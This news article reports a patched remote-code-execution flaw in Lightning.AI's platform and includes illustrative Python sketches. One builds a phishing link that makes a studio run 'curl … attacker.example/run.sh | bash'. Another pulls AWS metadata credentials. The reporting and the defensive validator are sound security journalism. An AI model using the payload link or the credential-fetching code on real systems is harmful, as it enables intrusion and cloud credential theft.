
Vulnerability in popular AI development platform could ‘shut down essentially everything you own’

The flaw in Lightning.AI’s platform, which has been patched, would have given root access to an attacker and broad control over a victim’s cloud-based studio and connected systems. 

A popular platform for developing AI systems has patched an easily exploitable vulnerability that would have given an attacker remote code execution privileges.

Researchers at application security firm Noma detail how the flaw, embedded in JavaScript code for Lightning.AI’s development platform, could be manipulated to give an attacker virtually unfettered access to a user’s cloud studio, as well as the ability to execute arbitrary code, exfiltrate sensitive data, and create, modify or delete files.

Noma researchers spotted a hidden parameter, called “command,” in the URL handled by the JavaScript code in Lightning.AI’s software. By manipulating where the parameter appears in the URL, an attacker could craft malicious phishing links targeting specific victims and studios.
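A minimal sketch of how such a link could be abused, assuming the parameter is read from the query string and executed without validation; the endpoint path, parameter handling and payload below are illustrative assumptions, not the exact URL structure Noma documented:

from urllib.parse import urlencode

# Hypothetical studio URL; the real Lightning.AI path and parameter handling are not reproduced here.
BASE_URL = "https://lightning.ai/example-org/example-studio/app"

# Arbitrary shell command the victim's studio would run if the hidden "command"
# parameter were passed, unvalidated, to a shell with root privileges.
payload = "curl -s https://attacker.example/run.sh | bash"

malicious_link = BASE_URL + "?" + urlencode({"command": payload})
print(malicious_link)
# Sent as a phishing link, opening it in the victim's authenticated session
# would execute the payload inside their cloud studio.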

According to Noma, the vulnerability was discovered Oct. 14, 2024, and researchers began engaging with representatives from Lightning.AI over Discord the same day. A patch was developed and implemented by Oct. 25.


Gal Moyal, who works in the office of Noma’s chief technology officer, told CyberScoop that the vulnerability carries a CVSS severity rating of 9.4 and offers “root access with the … highest privileges there are.” A spokesperson for Noma told CyberScoop that a formal CVE ID was not requested for the flaw.

That level of access could also have threatened the security of other systems and subsystems connected to a victim’s cloud studio, potentially allowing an attacker to move laterally. The command vulnerability could also be used to access the account’s AWS cloud metadata, potentially giving an attacker access to sensitive data, access tokens and user information.
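As a generic illustration of that risk, and not something specific to Lightning.AI, code running inside a compromised AWS-backed studio could query the instance metadata service for temporary credentials. The sketch below assumes the legacy IMDSv1 endpoint is reachable without a session token:

import urllib.request

# Standard AWS instance metadata service (IMDS) address; reachable only from inside the instance.
IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# List the IAM role attached to the instance, then fetch its temporary credentials.
role = urllib.request.urlopen(IMDS, timeout=2).read().decode().strip()
creds = urllib.request.urlopen(IMDS + role, timeout=2).read().decode()
print(creds)  # JSON with AccessKeyId, SecretAccessKey and a session Token an attacker could exfiltrate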

“This is an example of a vulnerability which … can shut down essentially everything you own,” Moyal said. “This is every secret that you own; your AWS account, your platform within Lightning.AI, anything that was connected to Lightning.AI can now be used by a malicious actor to their want.”

Moyal said the inclusion of the hidden parameter was either a mistake that someone forgot to delete from the JavaScript code or a design flaw.

A spokesperson for Lightning.AI told CyberScoop that the company has no evidence of the bug being exploited in the wild by malicious parties and has put additional security protections in place beyond the patch.


“Our security review confirmed no unauthorized access occurred before the fix,” the spokesperson said in an email. “Beyond patching, we strengthened input validation, tightened access controls, and reinforced internal security protocols to prevent similar risks.”
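A minimal sketch of the kind of input validation that mitigates this class of bug, illustrative only and not Lightning.AI’s actual fix: request parameters are checked against a fixed allowlist and never handed to a shell. The parameter and action names are hypothetical:

from urllib.parse import parse_qs

ALLOWED_ACTIONS = {"open_editor", "restart_kernel", "show_logs"}  # hypothetical action names

def handle_query(query_string: str) -> str:
    # Reject anything that is not an explicitly allowed action; never execute the raw value.
    action = parse_qs(query_string).get("action", [""])[0]
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"rejected unknown action: {action!r}")
    return action  # dispatch to a fixed handler keyed by this value

print(handle_query("action=show_logs"))   # accepted
# handle_query("action=rm -rf /")         # would raise ValueError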

Lightning.AI (formerly Grid.AI) was founded in 2019 and has since become a widely used platform for developers to collaborate on and build cloud-based AI systems. The company is an AWS partner and recently raised $50 million in equity from investors including JPMorgan Chase, NVIDIA, Cisco Investments and K5 Global.

The founders behind the company were also developers for PyTorch Lightning, a popular open-source tool that developers use to scale deep-learning AI systems that run on distributed hardware. The tool’s GitHub page has more than 28,000 stars and has been forked more than 3,400 times.  

In an interview with TechCrunch in November 2024, co-founder William Falcon claimed that NVIDIA’s suite of NeMo large language models and Stability.AI’s Stable Diffusion tool were trained or built using Lightning.AI tools.

Moyal said the vulnerability is an example of how the rush to adopt emerging AI products could leave businesses more vulnerable to critical flaws like the one Noma found.


“We are in an AI world where everything is fast paced,” he said. “There is very high, accelerated adoption of AI, and right now, I feel like this is a very fertile ground for mistakes and bugs.”


Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.
